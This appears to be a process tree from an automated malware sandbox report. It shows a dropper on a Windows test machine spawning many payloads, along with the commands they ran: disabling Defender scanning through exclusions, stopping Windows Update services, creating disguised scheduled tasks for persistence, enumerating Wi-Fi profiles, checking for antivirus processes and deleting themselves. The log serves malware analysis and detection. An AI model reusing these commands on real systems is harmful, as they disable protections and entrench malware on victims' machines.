-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5308,i,6553254027333030755,15900441114291298193,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5044 /prefetch:13⤵PID:3868
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5096,i,6553254027333030755,15900441114291298193,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3352 /prefetch:83⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:6044
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3396,i,6553254027333030755,15900441114291298193,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1116 /prefetch:83⤵PID:4760
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
PID:3116
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"2⤵PID:1412
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
PID:3000
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵PID:1060
-
-
C:\Windows\System32\dwm.exeC:\Windows\System32\dwm.exe2⤵PID:5980
-
-
C:\Users\Admin\Desktop\4363463463464363463463463.exe"C:\Users\Admin\Desktop\4363463463464363463463463.exe"2⤵PID:5324
-
C:\Users\Admin\Desktop\Files\o.exe"C:\Users\Admin\Desktop\Files\o.exe"3⤵PID:4928
-
C:\Windows\sysklnorbcv.exeC:\Windows\sysklnorbcv.exe4⤵PID:2512
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"5⤵PID:2004
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"6⤵
- Command and Scripting Interpreter: PowerShell
PID:3100
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS5⤵PID:5272
-
C:\Windows\SysWOW64\sc.exesc stop UsoSvc6⤵
- Launches sc.exe
PID:196
-
-
C:\Windows\SysWOW64\sc.exesc stop WaaSMedicSvc6⤵
- Launches sc.exe
PID:3960
-
-
C:\Windows\SysWOW64\sc.exesc stop wuauserv6⤵
- Launches sc.exe
PID:5876
-
-
C:\Windows\SysWOW64\sc.exesc stop DoSvc6⤵
- Launches sc.exe
PID:1260
-
-
C:\Windows\SysWOW64\sc.exesc stop BITS6⤵
- Launches sc.exe
PID:6496
-
-
-
C:\Users\Admin\AppData\Local\Temp\526226167.exeC:\Users\Admin\AppData\Local\Temp\526226167.exe5⤵PID:4760
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f6⤵PID:5504
-
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f7⤵PID:7084
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"6⤵PID:4696
-
C:\Windows\system32\schtasks.exeschtasks /delete /f /tn "Windows Upgrade Manager"7⤵PID:6244
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1212519265.exeC:\Users\Admin\AppData\Local\Temp\1212519265.exe5⤵PID:6020
-
-
C:\Users\Admin\AppData\Local\Temp\497811603.exeC:\Users\Admin\AppData\Local\Temp\497811603.exe5⤵PID:6944
-
C:\Users\Admin\AppData\Local\Temp\1131138103.exeC:\Users\Admin\AppData\Local\Temp\1131138103.exe6⤵PID:2128
-
-
-
-
-
C:\Users\Admin\Desktop\Files\Client-built.exe"C:\Users\Admin\Desktop\Files\Client-built.exe"3⤵PID:196
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "MS Build Tools" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft-Build-Tools\Client.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:5148
-
-
C:\Users\Admin\AppData\Roaming\Microsoft-Build-Tools\Client.exe"C:\Users\Admin\AppData\Roaming\Microsoft-Build-Tools\Client.exe"4⤵PID:5348
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "MS Build Tools" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft-Build-Tools\Client.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:4064
-
-
-
-
C:\Users\Admin\Desktop\Files\v7wa24td.exe"C:\Users\Admin\Desktop\Files\v7wa24td.exe"3⤵PID:1276
-
C:\Users\Admin\AppData\Local\dp3s81isgn\tor\tor-real.exe"C:\Users\Admin\AppData\Local\dp3s81isgn\tor\tor-real.exe" -f "C:\Users\Admin\AppData\Local\dp3s81isgn\tor\torrc.txt"4⤵PID:6396
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"4⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:7052 -
C:\Windows\system32\chcp.comchcp 650015⤵PID:7132
-
-
C:\Windows\system32\netsh.exenetsh wlan show profiles5⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:2268
-
-
C:\Windows\system32\findstr.exefindstr /R /C:"[ ]:[ ]"5⤵PID:6204
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"4⤵PID:3000
-
C:\Windows\system32\chcp.comchcp 650015⤵PID:1800
-
-
C:\Windows\system32\netsh.exenetsh wlan show networks mode=bssid5⤵PID:6152
-
-
C:\Windows\system32\findstr.exefindstr "SSID BSSID Signal"5⤵PID:6160
-
-
-
-
C:\Users\Admin\Desktop\Files\hs.exe"C:\Users\Admin\Desktop\Files\hs.exe"3⤵PID:6500
-
-
C:\Users\Admin\Desktop\Files\12.exe"C:\Users\Admin\Desktop\Files\12.exe"3⤵PID:6700
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Desktop\Files\12.exe" & del "C:\ProgramData\*.dll"" & exit4⤵PID:7128
-
C:\Windows\SysWOW64\timeout.exetimeout /t 55⤵
- Delays execution with timeout.exe
PID:6768
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6700 -s 14004⤵
- Program crash
PID:6740
-
-
-
C:\Users\Admin\Desktop\Files\major.exe"C:\Users\Admin\Desktop\Files\major.exe"3⤵PID:6292
-
-
C:\Users\Admin\Desktop\Files\MARRON.exe"C:\Users\Admin\Desktop\Files\MARRON.exe"3⤵PID:6736
-
-
C:\Users\Admin\Desktop\Files\XClient.exe"C:\Users\Admin\Desktop\Files\XClient.exe"3⤵PID:6732
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Files\XClient.exe'4⤵
- Command and Scripting Interpreter: PowerShell
PID:2788
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'4⤵
- Command and Scripting Interpreter: PowerShell
PID:2708
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Google Chrome.exe'4⤵
- Command and Scripting Interpreter: PowerShell
PID:3364
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Google Chrome.exe'4⤵
- Command and Scripting Interpreter: PowerShell
PID:3396
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Google Chrome" /tr "C:\Users\Admin\AppData\Local\Google Chrome.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:6784
-
-
-
C:\Users\Admin\Desktop\Files\coreplugin.exe"C:\Users\Admin\Desktop\Files\coreplugin.exe"3⤵PID:976
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k move Anytime Anytime.cmd & Anytime.cmd & exit4⤵PID:5956
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:6896
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa.exe opssvc.exe"5⤵PID:3412
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:7292
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"5⤵PID:8816
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 2971455⤵PID:8220
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "CorkBkConditionsMoon" Scary5⤵PID:9168
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Dependence + ..\Nsw + ..\Developmental + ..\Shared + ..\Ranges + ..\Notify + ..\Pending + ..\Previously k5⤵PID:9072
-
-
C:\Users\Admin\AppData\Local\Temp\297145\Cultures.pifCultures.pif k5⤵PID:3112
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 55⤵PID:8584
-
-
-
-
C:\Users\Admin\Desktop\Files\CompleteStudio.exe"C:\Users\Admin\Desktop\Files\CompleteStudio.exe"3⤵PID:2188
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:1124
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:404
-
-
-
C:\Users\Admin\Desktop\Files\octus.exe"C:\Users\Admin\Desktop\Files\octus.exe"3⤵PID:1492
-
C:\Users\Admin\AppData\Roaming\ff5c5ee747fc\feburary.exe"C:\Users\Admin\AppData\Roaming\ff5c5ee747fc\feburary.exe"4⤵PID:4984
-
C:\Windows\SysWOW64\cmd.exe/c timeout 5 && del "C:\Users\Admin\AppData\Roaming\ff5c5ee747fc\feburary.exe" && exit5⤵PID:3416
-
C:\Windows\SysWOW64\timeout.exetimeout 56⤵
- Delays execution with timeout.exe
PID:6200
-
-
-
-
-
C:\Users\Admin\Desktop\Files\m.exe"C:\Users\Admin\Desktop\Files\m.exe"3⤵PID:3936
-
-
C:\Users\Admin\Desktop\Files\system404.exe"C:\Users\Admin\Desktop\Files\system404.exe"3⤵PID:4748
-
-
C:\Users\Admin\Desktop\Files\qth5kdee.exe"C:\Users\Admin\Desktop\Files\qth5kdee.exe"3⤵PID:2880
-
-
C:\Users\Admin\Desktop\Files\aaa.exe"C:\Users\Admin\Desktop\Files\aaa.exe"3⤵PID:2312
-
-
C:\Users\Admin\Desktop\Files\Setup.exe"C:\Users\Admin\Desktop\Files\Setup.exe"3⤵PID:7880
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM4⤵PID:7580
-
-
-
-
C:\Users\Admin\Desktop\4363463463464363463463463.exe"C:\Users\Admin\Desktop\4363463463464363463463463.exe"2⤵PID:6328
-
C:\Users\Admin\Desktop\Files\1SkillLauncher.exe"C:\Users\Admin\Desktop\Files\1SkillLauncher.exe"3⤵PID:5136
-
C:\Users\Admin\Desktop\Files\EakLauncher_Update.exe"C:\Users\Admin\Desktop\Files\EakLauncher_Update.exe"4⤵PID:2528
-
C:\Users\Admin\Desktop\Files\RenderMan.Zoom.LabVIEW.1.8.1.exe"C:\Users\Admin\Desktop\Files\RenderMan.Zoom.LabVIEW.1.8.1.exe"5⤵PID:948
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/rsM4AgvAhn6⤵PID:6264
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9d1ec3cb8,0x7ff9d1ec3cc8,0x7ff9d1ec3cd87⤵PID:7136
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1912,11009046646526046325,5996045653455134997,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1904 /prefetch:27⤵PID:6992
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1912,11009046646526046325,5996045653455134997,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2376 /prefetch:37⤵PID:7004
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1912,11009046646526046325,5996045653455134997,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2704 /prefetch:87⤵PID:2140
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,11009046646526046325,5996045653455134997,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3252 /prefetch:17⤵PID:2212
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,11009046646526046325,5996045653455134997,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:17⤵PID:4928
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,11009046646526046325,5996045653455134997,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4728 /prefetch:17⤵PID:6756
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1912,11009046646526046325,5996045653455134997,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=2916 /prefetch:87⤵PID:8196
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1912,11009046646526046325,5996045653455134997,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=1896 /prefetch:87⤵PID:3416
-
-
-
-
-
-
C:\Users\Admin\Desktop\Files\r.exe"C:\Users\Admin\Desktop\Files\r.exe"3⤵PID:176
-
\??\c:\windows\SysWOW64\svchost.exec:\windows\system32\svchost.exe4⤵PID:8420
-
-
-
C:\Users\Admin\Desktop\Files\t.exe"C:\Users\Admin\Desktop\Files\t.exe"3⤵PID:6572
-
-
C:\Users\Admin\Desktop\Files\MJPVgHw.exe"C:\Users\Admin\Desktop\Files\MJPVgHw.exe"3⤵PID:6132
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM4⤵PID:7044
-
-
-
C:\Users\Admin\Desktop\Files\downloader.exe"C:\Users\Admin\Desktop\Files\downloader.exe"3⤵PID:2860
-
-
C:\Users\Admin\Desktop\Files\del.exe"C:\Users\Admin\Desktop\Files\del.exe"3⤵PID:3400
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F52A.tmp\F52B.tmp\F52C.bat C:\Users\Admin\Desktop\Files\del.exe"4⤵PID:7752
-
C:\Windows\system32\timeout.exeTIMEOUT /T 55⤵
- Delays execution with timeout.exe
PID:7840
-
-
-
-
C:\Users\Admin\Desktop\Files\tpeinf.exe"C:\Users\Admin\Desktop\Files\tpeinf.exe"3⤵PID:5668
-
C:\Windows\sysppvrdnvs.exeC:\Windows\sysppvrdnvs.exe4⤵PID:7400
-
-
-
C:\Users\Admin\Desktop\Files\123.exe"C:\Users\Admin\Desktop\Files\123.exe"3⤵PID:7772
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:4160
-
-
-
C:\Users\Admin\Desktop\Files\twztl.exe"C:\Users\Admin\Desktop\Files\twztl.exe"3⤵PID:8864
-
C:\Users\Admin\sysppvrdnvs.exeC:\Users\Admin\sysppvrdnvs.exe4⤵PID:7244
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"5⤵PID:6132
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"6⤵
- Command and Scripting Interpreter: PowerShell
PID:7100
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait5⤵PID:8328
-
C:\Windows\SysWOW64\sc.exesc stop UsoSvc6⤵
- Launches sc.exe
PID:8776
-
-
C:\Windows\SysWOW64\sc.exesc stop WaaSMedicSvc6⤵
- Launches sc.exe
PID:6780
-
-
C:\Windows\SysWOW64\sc.exesc stop wuauserv6⤵
- Launches sc.exe
PID:5068
-
-
C:\Windows\SysWOW64\sc.exesc stop DoSvc6⤵
- Launches sc.exe
PID:2480
-
-
C:\Windows\SysWOW64\sc.exesc stop BITS /wait6⤵
- Launches sc.exe
PID:1616
-
-
-
C:\Users\Admin\AppData\Local\Temp\471719615.exeC:\Users\Admin\AppData\Local\Temp\471719615.exe5⤵PID:8828
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f6⤵PID:6644
-
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f7⤵PID:5048
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"6⤵PID:8320
-
C:\Windows\system32\schtasks.exeschtasks /delete /f /tn "Windows Upgrade Manager"7⤵PID:7328
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\309012054.exeC:\Users\Admin\AppData\Local\Temp\309012054.exe5⤵PID:5924
-
-
C:\Users\Admin\AppData\Local\Temp\179624388.exeC:\Users\Admin\AppData\Local\Temp\179624388.exe5⤵PID:760
-
-
-
-
C:\Users\Admin\Desktop\Files\t1.exe"C:\Users\Admin\Desktop\Files\t1.exe"3⤵PID:9208
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
PID:6880
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"2⤵PID:5788
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"2⤵PID:7536
-
-
C:\Users\Admin\Desktop\Files\MARRON.exe"C:\Users\Admin\Desktop\Files\MARRON.exe"2⤵PID:3092
-
-
C:\Users\Admin\AppData\Local\Temp\B68B.tmp.zx.exe"C:\Users\Admin\AppData\Local\Temp\B68B.tmp.zx.exe"2⤵PID:3340
-
C:\Users\Admin\AppData\Local\Temp\B68B.tmp.zx.exe"C:\Users\Admin\AppData\Local\Temp\B68B.tmp.zx.exe"3⤵PID:8892
-
-
-
C:\Users\Admin\AppData\Local\Temp\B92C.tmp.x.exe"C:\Users\Admin\AppData\Local\Temp\B92C.tmp.x.exe"2⤵PID:8504
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:3080
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4732 -ip 47321⤵PID:3596
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:5624
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:3548
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5408 -ip 54081⤵PID:4532
-
C:\Users\Admin\AppData\Local\sdkwifhsyaunfs\JAVA_V3.exeC:\Users\Admin\AppData\Local\sdkwifhsyaunfs\JAVA_V3.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2312 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\sdkwifhsyaunfs\JAVA_V3.exe"; Add-MpPreference -ExclusionProcess "JAVA_V3.exe"; exit"2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:5984
-
-
C:\ProgramData\cktf\jcuqdd.exeC:\ProgramData\cktf\jcuqdd.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3556
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:400
-
C:\Users\Admin\AppData\Local\sdkwifhsyaunfs\JAVA_V3.exeC:\Users\Admin\AppData\Local\sdkwifhsyaunfs\JAVA_V3.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3536 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\sdkwifhsyaunfs\JAVA_V3.exe"; Add-MpPreference -ExclusionProcess "JAVA_V3.exe"; exit"2⤵
- Command and Scripting Interpreter: PowerShell
PID:2924
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5028
-
C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5708
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 6700 -ip 67001⤵PID:7052
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 6856 -ip 68561⤵PID:6880
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5584
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5260
-
C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"1⤵PID:2040
-
